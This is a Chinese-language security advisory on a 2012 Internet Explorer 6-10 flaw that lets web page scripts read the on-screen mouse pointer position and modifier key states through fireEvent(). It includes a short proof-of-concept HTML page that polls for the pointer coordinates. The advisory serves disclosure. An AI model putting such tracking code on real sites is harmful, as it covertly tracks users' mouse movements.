Microsoft Internet Explorer鼠标指针位置信息泄露漏洞
发布日期:2012-12-11
更新日期:2012-12-17
受影响系统:Microsoft Internet Explorer 9.x
Microsoft Internet Explorer 8.x
Microsoft Internet Explorer 7.x
Microsoft Internet Explorer 6.x
Microsoft Internet Explorer 10.x
描述:
BUGTRAQ ID:
56921
Microsoft Internet Explorer是微软公司推出的一款网页浏览器,使用相当广泛。
Internet Explorer 6-10版本的事件模型会用一些鼠标事件属性填充全局"Event"对象,再结合手动触发事件的fireEvent()方法,即使包含网页的选项卡是不活动的、IE窗口失去焦点或最小化了,也可允许任何网页(或任何网页内的iframe)上的JS检测到屏幕上鼠标指针的位置。fireEvent()方法也可暴露 control、shift、alt键的状态。受影响的Event对象属性包括altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x, y。攻击者可以通过购买一些网站的display ad位置,利用此漏洞获取用户的鼠标运动踪迹。
<*来源:Nick Johnson (
arachnid@notdot_net.meta.net.nz)
链接:
http://seclists.org/bugtraq/2012/Dec/81
http://iedataleak.spider.io/demo
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://windows.microsoft.com/en-US/internet-explorer/download-ie浏览次数:4066
严重程度:0(网友投票)
